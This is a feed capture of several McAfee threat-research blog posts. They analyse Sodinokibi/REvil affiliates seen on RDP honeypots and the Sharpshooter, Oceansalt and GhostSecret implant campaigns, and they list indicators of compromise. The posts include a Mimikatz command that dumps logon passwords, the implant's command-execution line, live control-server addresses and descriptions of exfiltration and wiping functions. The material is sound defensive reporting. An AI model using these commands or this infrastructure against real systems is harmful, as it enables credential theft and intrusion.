Ryan Sherstobitoff – McAfee Blogs https://securingtomorrow.mcafee.com Securing Tomorrow. Today. Mon, 28 Oct 2019 16:23:29 +0000 en-US hourly 1 https://securingtomorrow.mcafee.com/wp-content/uploads/2018/11/cropped-favicon-32x32.png Ryan Sherstobitoff – McAfee Blogs https://securingtomorrow.mcafee.com 32 32 McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Crescendo https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/#respond Mon, 21 Oct 2019 04:01:24 +0000 https://securingtomorrow.mcafee.com/?p=96926

Episode 4: Crescendo This is the final installment of the McAfee Advanced Threat Research (ATR) analysis of Sodinokibi and its connections to GandGrab, the most prolific Ransomware-as-a-Service (RaaS) Campaign of 2018 and mid 2019. In this final episode of our series we will zoom in on the operations, techniques and tools used by different affiliate […]

The post McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Crescendo appeared first on McAfee Blogs.

]]>

Episode 4: Crescendo

This is the final installment of the McAfee Advanced Threat Research (ATR) analysis of Sodinokibi and its connections to GandGrab, the most prolific Ransomware-as-a-Service (RaaS) Campaign of 2018 and mid 2019.

In this final episode of our series we will zoom in on the operations, techniques and tools used by different affiliate groups spreading Sodinokibi ransomware.

Since May we have observed several different modus operandi by different affiliates, for example:

  • Distributing the ransomware using spear-phishing and weaponized documents
  • Bat-files downloading payloads from Pastebin and inject them into a process on the operating system
  • Compromising RDP and usage of script files and password cracking tools to distribute over the victim’s network
  • Compromise of Managed Service Providers and usage of their distribution software to spread the ransomware

To understand more about how this enemy operates, we in McAfee Advanced Threat Research (ATR) decided to operate a global network of honeypots. We were aware of the lively underground trade market of RDP credentials and were curious about what someone would do with a compromised machine. Would they distribute the Sodinokibi ransomware? Would they execute the DejaBlue or BlueKeep exploits? Our specially designed and built RDP honeypots would give us those insights.

Like Moths to a Flame

From June until September 2019, we observed several groups compromise our honey pots and conduct activities related to Sodinokibi; we were able to fully monitor attackers and their actions without their knowledge.

It is important to note the golden rule we operated under: the moment criminal actions were prepared or about to be executed, the actor would be disconnected and the machine would be restored to its original settings with a new IP address.

We noticed some of our honeypot RDP servers were attacked by Persian-speaking actors that were actively harvesting credentials. Our analysis of these attacks led us to various Persian underground channels offering the same tools we observed appearing in Sodinokibi intrusions. Some of these tools are closed source and custom made, originating from within the channels in our analysis.

In this blog we will highlight a few of the intrusions we observed.

Group 1 – Unknown Affiliate ID

McAfee ATR observed initial activity against our South American honey pot begin in late May 2019. We had full visibility as the actor loaded a number of tools, including Sodinokibi, during the initial intrusion period.

The following ransom note (uax291-readme.txt) was dropped onto the system on June 10th, 2019. The actor utilized Masscan and NLBrute to scan and target other assets over RDP which fits with the behavior we have seen in all other Sodinokibi intrusions tracked by McAfee ATR. The actor then created a user account ‘backup’ and proceeded to consistently connect from an IP address range in Belgrade, Serbia.

Group 2 – Affiliate ID 34

Campaign 295 (based on sub-ID in the malware configuration)

The following Sodinokibi variant appeared in our South American honey pot with the original file name of H.a.n.n.a.exe.

  • 58C390FE5845E2BB88D1D22610B0CA61 (June 8th, 2019)

Extracting the configuration from the ransomware sample as we conducted during our affiliate research, the affiliate-id is nr 34.

Upon initial intrusion, the actor created several user accounts on the target system between June 10th and June 11th.  The malware Sodinokibi and credential-harvesting tool Mimikatz were executed under the user account “ibm” that the actor created as part of the entry into the system

Further information revealed that the actor was connecting from two IP addresses in Poland and Finland via the ‘ibm’ account. These logins originated from these countries in a 24hr period between July 10th and 11th with the following two unique machine names WIN-S5N2M6EGS5J and TS11. Machine name WIN-S5N2M6EGS5J was observed to be used by another actor that created the account “asp” and originated from the same Polish IP address.

The actor deployed a variant of the Mimikatz credential harvester during the intrusion, with the following custom BAT file:

We have seen a consistent usage of various custom files used to interact with hacking tools that are shared among the underground communities.

Another tool, known as Everything.exe, was also executed during the same period. This tool was used to index the entire file system and what was on the target system. This tool is not considered malicious and was developed by a legitimate company but can be used for profiling purposes. The usage of reconnaissance tools to profile the machine is interesting as it indicates potential manual lateral movement attempts by the actor on the target system.

July 20th to 30th Intrusion

Activity observed during this period utilized tools similar to those used in other intrusions we have observed in multiple regions, including those by Affiliate ID 34.

In this activity McAfee ATR identified NLBrute being executed again to target victims over RDP; a pattern we have seen over and over again in intrusions involving Sodinokibi.  A series of logins from Iran were observed between July 25th and July 30th, 2019.

We have also seen crypto currency mining apps deployed in most of the intrusions involving Sodinokibi, which may suggest some interesting side activity for these groups. In this incident we discovered a miner gate configuration file with a Gmail address.

Using Open-Source Intelligence (OSINT) investigation techniques, we identified an individual that is most likely tied to the discovered Gmail address. Based on our analysis, this individual is likely part of some Persian-speaking credential cracking crew harvesting RDP credentials and other types of data. The individual is sharing information related to Masscan and Kport scan results for specific countries that can be used for brute force operations.

ACTOR PROFILE

Further, we observed this actor on a Telegram channel discussing operations which align to the behavior we observed during intrusions on our honey pot. The data shared appears to be results from tools such as Masscan or Kport-scan that would be used to compromise further assets.

DISCUSSION OF SCANNING IN FARSI, ON PRIVATE CHANNEL

Other tools were found to have been executed the same day as the activity documented include:

  • Mimikatz

Was executed manually from the command line with the following parameters:

mimikatz.exe “privilege::debug” “sekurlsa::logonPasswords full” “exit”

  • Slayer Leecher
  • MinerGate

Group 3 – Affiliate ID 19

We observed the following Sodinokibi ransom variants attributed to this affiliate appearing in the honey pot in the Middle East. The attacker downloaded a file, ابزار کرک.zip, which can be mostly found in Farsi language private channels. The tool is basically a VPS Checker (really an RDP cracker) as discussed on the channels in the underground.

Campaign 36

Activity from June 3rd to 26th indicates that the attacker present on the system was conducting operations involving the Sodinokibi ransomware. When linking back activity, we observed one notable tool the actor had used during the operation.

‘Hidden-User.bat’ was designed to create hidden users on the target system. This tool links back to some underground distribution on Farsi-speaking private channels.

The file being shared is identical to the one we found to be used actively in the Sodinokibi case in different instances in June 2019, in different cities in the Middle East. We found the following Farsi-speaking users sharing and discussing this tool specifically (Cryptor007 and MR Amir), and others active in these groups. McAfee ATR observed this tool being used on June 13th, 2019 and June 26th, 2019 by the same actors in different regions.

HIDDEN-USER.bat

POSTED IMAGE OF THE TOOL IN USE

These Sodinokibi variants are strictly appearing in Israel from our observations:

  • 009666D97065E97FFDE7B1584DB802EB (June 3rd, 2019)
  • 3746F1823A47B4AA4B520264D1CF4606 (June 11th, 2019)

We observed the actor dropping one of the above-mentioned variants of Sodinokibi. In this case, the login came from an IP address originating in Iran and with a machine with a female Persian name.

The attackers connecting are most likely Farsi-speaking, as is evident by the browsing history uncovered by McAfee ATR, which indicates where a number of the tools utilized originate from, including Farsi language file sharing sites, such as Picofile.com and Soft98.ir, that contain malicious tools such as NLBrute, etc.

FARSI LANGUAGE SITE FOUND IN BROWSING HISTORY

We observed the actor attempting to run an RDP brute force attack using NLBrute downloaded from the Iranian site Picofile.com. The target was several network blocks in Oman and the United Arab Emirates in the Middle East.

In our analysis we discovered an offer to install ransomware on servers posted in Farsi speaking on August 19th,. This posting date corresponds with the timing of attacks observed in the Middle East. The services mentioned are specifically targeting servers that have been obtained via RDP credential theft campaigns. It is possible that these actors are coming in after the fact and installing ransomware on behalf of the main organizer, according to actor chatter. One specific Farsi language message indicates these services for a list of countries where they could install ransomware for the potential client.

FARSI LANGUAGE MESSAGE FROM PERSIAN LANGUAGE CHANNEL

Tools and Methods of Group 1

The operators responsible for intrusions involving Sodinokibi variants with an unknown affiliate ID utilize a variety of methods:

  • Initial intrusions made over RDP protocol
  • Using Masscan to identify potential victims
  • Executing NLBrute with custom password lists

Tools and Methods of Group 2

The operators responsible for intrusions involving Sodinokibi variants with PID 34 utilize a variety of methods:

  • Intrusion via RDP protocol
  • Manual execution of subsequent stages of the operation
  • Deployment of Sodinokibi
  • Deployment of Mimikatz
  • Utilization of CryptoCurrency mining
  • Deployment of other brute force and checker tools
  • Running mass port scans and other reconnaissance activities to identify potential targets
  • Executing NLBrute with custom password lists
  • Some of the operators appear write in Farsi and are originating from Iranian IP address space when connecting to observed targets

Tools and Methods of Group 3

The operators responsible for intrusions involving Sodinokibi variants with PID 19 utilize a variety of methods:

  • Intrusion via RDP protocol
  • Manual execution of subsequent stages of the operation
  • Likely a cracking crew working on behalf of an affiliate
  • Deployment of Sodinokibi
  • Custom scripts to erase logs and create hidden users
  • Usage of Neshta to scan internal network shares within an organization in an effort to spread Sodinokibi
  • Running mass port scans and other reconnaissance activities to identify potential targets
  • Limited use of local exploits to gain administrative access
  • Executing NLBrute with custom password lists
  • Some of the operators appear to write in Farsi and are originating from Iranian IP address space when connecting to observed targets

Conclusion

In our blog series about Sodinokibi we began by analyzing the code we asked ourselves the question, “Why Persian?” With the information retrieved from our honeypot investigations, it might give us a hypothesis that the Persian language is present due to the involvement of Persian-speaking affiliates. Time and evidence will tell.

We observed many affiliates using different sets of tools and skills to gain profit and, across the series, we highlighted different aspects of this massive ongoing operation.

To protect your organization against Sodinokibi, make sure your defense is layered. As demonstrated, the actors we are facing either buy, brute-force or spear-phish themselves into your company or use a trusted-third party that has access to your network. Some guidelines for organizations to protect themselves include employing sandboxing, backing up data, educating their users, and restricting access.

As long as we support the ransomware model, ransomware will exist as it has for the last four years. We cannot fight alone against ransomware and have to unite as public and private parties. McAfee is one of the founding partners of NoMoreRansom.org and are supporting Law Enforcement agencies around the globe in fighting ransomware.

 

We hope you enjoyed reading this series of blogs about Sodinokibi.

The post McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Crescendo appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/feed/ 0
‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/#respond Wed, 12 Dec 2018 11:01:09 +0000 https://securingtomorrow.mcafee.com/?p=93008

This post was written with contributions from the McAfee Advanced Threat Research team.   The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download […]

The post ‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure appeared first on McAfee Blogs.

]]>

This post was written with contributions from the McAfee Advanced Threat Research team.  

The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries.

Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.

Read our full analysis of Operation Sharpshooter.

Have we seen this before?

This campaign, while masquerading as legitimate industry job recruitment activity, gathers information to monitor for potential exploitation. Our analysis also indicates similar techniques associated with other job recruitment campaigns.

Global impact

In October and November 2018, the Rising Sun implant has appeared in 87 organizations across the globe, predominantly in the United States, based on McAfee telemetry and our analysis. Based on other campaigns with similar behavior, most of the targeted organizations are English speaking or have an English-speaking regional office. This actor has used recruiting as a lure to collect information about targeted individuals of interest or organizations that manage data related to the industries of interest. The McAfee Advanced Threat Research team has observed that the majority of targets were defense and government-related organizations.

Targeted organizations by sector in October 2018. Colors indicate the most prominently affected sector in each country. Source: McAfee® Global Threat Intelligence.

Infection flow of the Rising Sun implant, which eventually sends data to the attacker’s control servers.

 

Conclusion

Our discovery of this new, high-function implant is another example of how targeted attacks attempt to gain intelligence. The malware moves in several steps. The initial attack vector is a document that contains a weaponized macro to download the next stage, which runs in memory and gathers intelligence. The victim’s data is sent to a control server for monitoring by the actors, who then determine the next steps.

We have not previously observed this implant. Based on our telemetry, we discovered that multiple victims from different industry sectors around the world have reported these indicators.

Was this attack just a first-stage reconnaissance operation, or will there be more? We will continue to monitor this campaign and will report further when we or others in the security industry receive more information. The McAfee Advanced Threat Research team encourages our peers to share their insights and attribution of who is responsible for Operation Sharpshooter.

 

Indicators of compromise

MITRE ATT&CK™ techniques

  • Account discovery
  • File and directory discovery
  • Process discovery
  • System network configuration discovery
  • System information discovery
  • System network connections discovery
  • System time discovery
  • Automated exfiltration
  • Data encrypted
  • Exfiltration over command and control channel
  • Commonly used port
  • Process injection

Hashes

  • 8106a30bd35526bded384627d8eebce15da35d17
  • 66776c50bcc79bbcecdbe99960e6ee39c8a31181
  • 668b0df94c6d12ae86711ce24ce79dbe0ee2d463
  • 9b0f22e129c73ce4c21be4122182f6dcbc351c95
  • 31e79093d452426247a56ca0eff860b0ecc86009

Control servers

  • 34.214.99.20/view_style.php
  • 137.74.41.56/board.php
  • kingkoil.com.sg/board.php

Document URLs

  • hxxp://208.117.44.112/document/Strategic Planning Manager.doc
  • hxxp://208.117.44.112/document/Business Intelligence Administrator.doc
  • hxxp://www.dropbox.com/s/2shp23ogs113hnd/Customer Service Representative.doc?dl=1

McAfee detection

  • RDN/Generic Downloader.x
  • Rising-Sun
  • Rising-Sun-DOC

 

The post ‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/feed/ 0
‘Operation Oceansalt’ Delivers Wave After Wave https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-oceansalt-delivers-wave-after-wave/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-oceansalt-delivers-wave-after-wave/#respond Thu, 18 Oct 2018 04:01:03 +0000 https://securingtomorrow.mcafee.com/?p=91999 In the latest findings from the McAfee Advanced Threat Research team, we examine an adversary that was not content with a single campaign, but launched five distinct waves adapted to their separate targets.

The post ‘Operation Oceansalt’ Delivers Wave After Wave appeared first on McAfee Blogs.

]]>
A wall eight feet high with three strands of barbed wire is considered sufficient to deter a determined intruder, at least according to the advice offered by the CISSP professional certification. Although physical controls can be part of a multifaceted defense, an electronic attack affords the adversary time to develop the necessary tools to bypass any logical wall set before them. In the latest findings from the McAfee Advanced Threat Research team, we examine an adversary that was not content with a single campaign, but launched five distinct waves adapted to their separate targets. The new report “Operation Oceansalt Attacks South Korea, U.S., and Canada with Source Code from Chinese Hacker Group” analyzes these waves and their victims, primarily in South Korea but with a few in the United States and Canada.

Although one reaction is to marvel at the level of innovation displayed by the threat actor(s), we are not discussing five new, never-before-seen malware variants—rather the reuse of code from implants seen eight years prior. The Oceansalt malware uses large parts of code from the Seasalt implant, which was linked to the Chinese hacking group Comment Crew. The level of reuse is graphically depicted below:

Code Visualization of Recent Oceansalt with Older Seasalt

Oceansalt, 2018.

Seasalt, 2010.

Who is Behind the Oceansalt Attack?

Originally taking the title APT1, the Comment Crew was seen as the threat actor conducting offensive cyber operations against the United States almost 10 years before. The obvious suspect is Comment Crew and, although this may seem a logical conclusion, we have not seen any activity from this group since they were initially exposed. Is it possible that this group has returned and, if so, why target South Korea?

It is possible that the source code developed by Comment Crew has now been used by another adversary. The code to our knowledge, however, has never been made public. Alternatively, this could be a “false flag” operation to suggest that we are seeing the re-emergence of Comment Crew. Creating false flags is a common practice.

What Really Matters

It is likely that reactions to this research will focus on debating the identity of the threat actor. Although this question is of great interest, answering it will require more than the technical evidence that private industry can provide. These limitations are frustrating. However, we can focus on the indicators of compromise presented in this report to detect, correct, and protect our systems, regardless of the source of these attacks.

Perhaps more important is the possible return of a previously dormant threat actor and, further, why should this campaign occur now? Regardless of whether this is a false flag operation to suggest the rebirth of Comment Crew, the impact of the attack is unknown. However, one thing is certain. Threat actors have a wealth of code available to leverage new campaigns, as previous research from the Advanced Threat Research team has revealed. In this case we see that collaboration not within a group but potentially with another threat actor—offering up considerably more malicious assets. We often talk about partnerships within the private and public sector as the key to tackling the cybersecurity challenges facing society. The bad actors are not putting these initiatives on PowerPoint slides and marketing material; they are demonstrating that partnerships can suit their ends, too.

The post ‘Operation Oceansalt’ Delivers Wave After Wave appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-oceansalt-delivers-wave-after-wave/feed/ 0
Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/#respond Wed, 25 Apr 2018 04:01:20 +0000 https://securingtomorrow.mcafee.com/?p=88422 McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure, entertainment, finance, health care, and telecommunications. This campaign, dubbed Operation GhostSecret, leverages multiple implants, tools, and malware variants associated with the state-sponsored cyber group Hidden Cobra. The infrastructure currently remains active. In this post, […]

The post Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide appeared first on McAfee Blogs.

]]>
McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure, entertainment, finance, health care, and telecommunications. This campaign, dubbed Operation GhostSecret, leverages multiple implants, tools, and malware variants associated with the state-sponsored cyber group Hidden Cobra. The infrastructure currently remains active. In this post, we dive deeply into this campaign. For a brief overview of this threat, see “Global Malware Campaign Pilfers Data from Critical Infrastructure, Entertainment, Finance, Health Care, and Other Industries.”

Our investigation into this campaign reveals that the actor used multiple malware implants, including an unknown implant with capabilities similar to Bankshot. From March 18 to 26 we observed the malware operating in multiple areas of the world. This new variant resembles parts of the Destover malware, which was used in the 2014 Sony Pictures attack.

Furthermore, the Advanced Threat Research team has discovered Proxysvc, which appears to be an undocumented implant. We have also uncovered additional control servers that are still active and associated with these new implants. Based on our analysis of public and private information from submissions, along with product telemetry, it appears Proxysvc was used alongside the 2017 Destover variant and has operated undetected since mid-2017.

The attackers behind Operation GhostSecret used a similar infrastructure to earlier threats, including SSL certificates used by FakeTLS in implants found in the Destover backdoor variant known as Escad, which was used in the Sony Pictures attack. Based on our technical analysis, telemetry, and data from submissions, we can assert with high confidence that this is the work of the Hidden Cobra group. The Advanced Threat Research team uncovered activity related to this campaign in March 2018, when the actors targeted Turkish banks. These initial findings appear to be the first stage of Operation GhostSecret. For more on the global aspect of this threat, see “Global Malware Campaign Pilfers Data from Critical Infrastructure of Entertainment, Finance, Health Care, and Other Industries.”

Analysis

The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018. This implant appears to be a derivative of implants authored before by Hidden Cobra and contains functionality similar to that of Bankshot, with code overlaps from other Hidden Cobra implants. However, the variant is not based on Bankshot. Our analysis of the portable executable’s rich-header data reveals that the two implants were compiled in different development environments. (The PE rich header is an undocumented part of a Windows executable that reveals unique information to identify the Microsoft compiler and linker used to create the program. It is helpful for identifying similarities between malware variants to establish common development environments.) Our analysis of the code and PE rich header indicates that Bankshot, Proxysvc, and the Destover-like implant are distinct families, but also contain overlapping code and functionality with current tools of Hidden Cobra.

PE rich header data from the 2018 Bankshot implant.

PE rich header data from the new February 2018 implant.

PE rich header data from Proxysvc.dll.

When we compared the PE rich header data of the new February 2018 implant with a variant of Backdoor.Escad (Destover) from 2014 shortly before the Sony Pictures attack, we found the signatures to be identical. The Destover-like variant is 83% similar in code to a 2015 variant and contains the same rich PE header signature as the Backdoor.Escad variant we analyzed. Thus the new implant is likely a derivative of components of Destover. We determined that the implant is not a direct copy of well-known previous samples of Destover; rather, Hidden Cobra created a new hybrid variant using functionality present in earlier versions.

2014 Backdoor.Escad (hash: 8a7621dba2e88e32c02fe0889d2796a0c7cb5144).

2015 Destover variant (7fe373376e0357624a1d21cd803ce62aa86738b6).

The February implant fe887fcab66d7d7f79f05e0266c0649f0114ba7c was obtained from an unknown submitter in the United States on February 14, two days after it was compiled. This Korean-language file used the control server IP address 203.131.222.83. The implant is nearly identical to an unknown 2017 sample (8f2918c721511536d8c72144eabaf685ddc21a35) except that the control server addresses are different. The 2017 sample used address 14.140.116.172. Both implants specifically use FakeTLS with PolarSSL, which we saw in previous Hidden Cobra implants. PolarSSL libraries have appeared in implants since the Sony Pictures incident and were used exclusively in the implant Backdoor.Destover. This implant incorporated a custom control server protocol that sends traffic over port 443. The implementation does not format the packets in standard SSL, but rather in a custom format and transmitted over SSL—hence, FakeTLS. The control server traffic when compared to Backdoor.Escad is nearly identical.

TLS traffic in Backdoor.Destover, the 2018 Destover-like variant.

TLS traffic in Backdoor.Escad.

Further research into IP address 14.140.116.172 leads us to additional hidden components involved in the overall infrastructure. Proxysvc.dll contains a list of hardcoded IP addresses, including the preceding address, all located in India. Despite the name, this component is not an SSL proxy, but rather a unique data-gathering and implant-installation component that listens on port 443 for inbound control server connections.

Proxysvc was first collected by public and private sources on March 22 from an unknown entity in the United States. The executable dropper for the component was submitted from South Korea on March 19. McAfee telemetry analysis from March 16 to 21 reveals that Proxysvc components were active in the wild. Our research shows this listener component appeared mostly in higher education organizations. We suspect this component is involved in core control server infrastructure. These targets were chosen intentionally to run Proxysvc because the attacker would have needed to know which systems were infected to connect to them. This data also indicates this infrastructure had been operating for more than a year before its discovery. The Advanced Threat Research team found this component running on systems in 11 countries. Given the limited capabilities of Proxysvc, it appears to be part of a covert network of SSL listeners that allow the attackers to gather data and install more complex implants or additional infrastructure. The SSL listener supports multiple control server connections, rather than a list of hardcoded addresses. By removing the dependency on hardcoded IP addresses and accepting only inbound connections, the control service can remain unknown.

The number of infected systems by country in which Proxysvc.dll was operating in March. Source: McAfee Advanced Threat Research.

The 2018 Destover-like implant appeared in organizations in 17 countries between March 14 and March 18. The impacted organizations are in industries such as telecommunications, health, finance, critical infrastructure, and entertainment.

The number of infected systems by country in which the Destover variant was operating in March. Source: McAfee Advanced Threat Research.

 

Control Servers

Further investigation into the control server infrastructure reveals the SSL certificate d0cb9b2d4809575e1bc1f4657e0eb56f307c7a76, which is tied to the control server 203.131.222.83, used by the February 2018 implant. This server resides at Thammasat University in Bangkok, Thailand. The same entity hosted the control server for the Sony Pictures implants. This SSL certificate has been used in Hidden Cobra operations since the Sony Pictures attack. Analyzing this certificate reveals additional control servers using the same PolarSSL certificate. Further analysis of McAfee telemetry data reveals several IP addresses that are active, two within the same network block as the 2018 Destover-like implant.

Number of infections by Thammasat Universityhosted control servers from March 1519, 2018. Source: McAfee Advanced Threat Research.

Implant Origins

McAfee Advanced Threat Research determined that the Destover-like variant originated from code developed in 2015. The code reappeared in variants surfacing in 2017 and 2018 using nearly the same functionality and with some modifications to commands, along with an identical development environment based on the rich PE header information.

Both implants (fe887fcab66d7d7f79f05e0266c0649f0114ba7c and 8f2918c721511536d8c72144eabaf685ddc21a35) are based on the 2015 code. When comparing the implant 7fe373376e0357624a1d21cd803ce62aa86738b6, compiled on August 8, 2015, we found it 83% similar to the implant from 2018. The key similarities and differences follow.

Similarities

  • Both variants build their API imports dynamically using GetProcAddress, including wtsapi32.dll for gathering user and domain names for any active remote sessions
  • Both variants contain a variety of functionalities based on command IDs issued by the control servers
  • Common capabilities of both malware:
    • Listing files in directory
    • Creating arbitrary processes
    • Writing data received from control servers to files on disk
    • Gathering information for all drives
    • Gathering process times for all processes
    • Sending the contents of a specific file to the control server
    • Wiping and deleting files on disk
    • Setting the current working directory for the implant
    • Sending disk space information to the control server
  • Both variants use a batch file mechanism to delete their binaries from the system
  • Both variants run commands on the system, log output to a temporary file, and send the contents of the file to their control servers

Differences

The following capabilities in the 2015 implant are missing from the 2018 variant:

  • Creating a process as a specific user
  • Terminating a specific process
  • Deleting a specific file
  • Setting file times for a specific file
  • Getting current system time and sending it to the control server
  • Reading the contents of a file on disk. If the filepath specified is a directory, then listing the directory’s contents.
  • Setting attributes on files

The 2015 implant does not contain a hardcoded value of the IP address it must connect to. Instead it contains a hardcoded sockaddr_in data structure (positioned at 0x270 bytes before the end of the binary) used by the connect() API to specify port 443 and control server IP addresses:

  • 193.248.247.59
  • 196.4.67.45

Both of these control servers used the PolarSSL certificate d0cb9b2d4809575e1bc1f4657e0eb56f307c7a76.

Proxysvc

At first glance Proxysvc, the SSL listener, looks like a proxy setup tool (to carry out man-in-the-middle traffic interception). However, a closer analysis of the sample reveals it is yet another implant using HTTP over SSL to receive commands from the control server.

Proxysvc appears to be a downloader whose primary capability is to deliver additional payloads to the endpoint without divulging the control address of the attackers. This implant contains a limited set of capabilities for reconnaissance and subsequent payload installations. This implant is a service DLL that can also run as a standalone process.

The ServiceMain() sub function of Proxysvc.

The implant cannot connect to a control server IP address or URL. Instead it accepts commands from the control server. The implant binds and listens to port 443 for any incoming connections. 

 

 

Proxysvc binding itself to the specified port.

Proxysvc begins accepting incoming requests to process. 

Proxysvc makes an interesting check while accepting connections from a potential control server. It checks against a list of IP addresses to make sure the incoming connection is not from any of the following addresses. If the incoming request does come from one of these, the implant offers a zero response (ASCII “0”) and shuts down the connection.

  • 121.240.155.74
  • 121.240.155.76
  • 121.240.155.77
  • 121.240.155.78
  • 223.30.98.169
  • 223.30.98.170
  • 14.140.116.172 

SSL Listener Capabilities

The implant receives HTTP-based commands from a control server and parses the HTTP Content-Type and Content-Length from the HTTP header. If the HTTP Content-Type matches the following value, then the implant executes the command specified by the control server:

Content-Type: 8U7y3Ju387mVp49A

HTTP Content-Type comparison with a custom implant value.

The implant has the following capabilities:

  • Writing an executable received from the control server into a temp file and executing it

Proxysvc writing a binary to a temp directory and executing it. 

  • Gathering system information and sending it to the control server. The system information gathered from the endpoint includes:
    • MAC address of the endpoint
    • Computer Name
    • Product name from HKLM\Software\Microsoft\Windows NT\CurrentVersion ProductName
    • This information is concatenated into a single string in the format: “MAC_Address|ComputerName|ProductName” and is sent to the control server
  • Recording HTTP requests from the control server to the temporary file prx in the implant’s install directory with the current system timestamp

Analyzing the Main Implant

The February 2018 implant contains a wide variety of capabilities including data exfiltration and arbitrary command execution on the victim’s system. Given the extensive command structure that the implant can receive from the control server, this is an extensive framework for data reconnaissance and exfiltration, and indicates advanced use. For example, the implant can wipe and delete files, execute additional implants, read data out of files, etc.

The implant begins execution by dynamically loading APIs to perform malicious activities. Libraries used to load the APIs include:

  • Kernel32.dll
  • Apvapi32.dll
  • Oleaut32.dll
  • Iphlpapi.dll
  • Ws2_32.dll
  • Wtsapi32.dll
  • Userenv.dll
  • Ntdll.dll

The main implant dynamically loading APIs.

As part of its initialization, the implant gathers basic system information and sends it to its hardcoded control server 203.131.222.83 using SSL over port 443:

  • Country name from system’s locale
  • Operating system version
  • Processor description from

HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ProcessorNameString

  • Computer name and network adapters information
  • Disk space information for disks C: through Z: including total memory in bytes, total available memory in bytes, etc.
  • Current memory status including total physical memory in bytes, total available memory, etc.
  • Domain name and usernames based on current remote sessions

Domain name and username extraction using Win32 WTS APIs.

Data Reconnaissance

The implant receives commands over SSL as encoded data. This data is decoded, and the correct command ID is derived. Valid command IDs reside between 0 and 0x1D.

Switch case handling command execution based on command IDs.

Based on the command ID, the implant can perform the following functions:

  • Gather system information and exfiltrate to the control server (same as the basic data-gathering functionality previously described)
  • Get volume information for all drives on the system (A: through Z:) and exfiltrate to the control server

Gathering volume information.

  • List files in a directory. The directory path is specified by the control server.
  • Read the contents of a file and send it to the control server

Reading file contents and sending it the control server.

  • Write data sent by the control server to a specified file path

Open handle to a file for writing with no shared permissions.

Writing data received from control server to file.

  • Create new processes based on the file path specified by the control server.

Creating a new process for a binary specified by the control server.

  • Wipe and delete files specified by the control server

Wiping and deleting files.

  • Execute a binary on the system using cmd.exe and log the results into a temp file, which is then read and the logged results are sent to the control server. The command line:

cmd.exe /c “<file_path> > %temp%\PM*.tmp 2>&1”

Executing a command and logging results to a temp file.

  • Get information for all currently running processes

Getting process times for all processes on the system.

Getting username and domain from accounts associated with a running process.

  • Delete itself from disk using a batch file.

Creating a batch file for self-deletion.

  • Store encoded data received from the control server as a registry value at:

HKLM\Software\Microsoft\Windows\CurrentVersion\TowConfigs Description

  • Set and get the current working directory for the implant

Setting and getting the current working directory for the implant’s process.

The command handler index table is organized in the implant as follows:

The command handler index table.

Conclusion

This analysis by the McAfee Advanced Threat Research team has found previously undiscovered components that we attribute to Hidden Cobra, which continues to target organizations around the world. The evolution in complexity of these data-gathering implants reveals an advanced capability by an attacker that continues its development of tools. Our investigation uncovered an unknown infrastructure connected to recent operations with servers in India using an advanced implant to establish a covert network to gather data and launch further attacks.

The McAfee Advanced Threat Research team will provide further updates as our investigation develops.

Fighting cybercrime is a global effort best undertaken through effective partnerships between the public and private sectors. McAfee is working with Thai government authorities to take down the control server infrastructure of Operation GhostSecret, while preserving the systems involved for further analysis by law enforcement authorities. By creating and maintaining partnerships with worldwide law enforcement, McAfee demonstrates that we are stronger together.  

Indicators of Compromise

McAfee detection

  • Trojan-Bankshot2

MITRE ATT&CK techniques

  • Exfiltration over control server channel: data is exfiltrated over the control server channel using a custom protocol
  • Commonly used port: the attackers used common ports such as port 443 for control server communications
  • Service execution: registers the implant as a service on the victim’s machine
  • Automated collection: the implant automatically collects data about the victim and sends it to the control server
  • Data from local system: local system is discovered and data is gathered
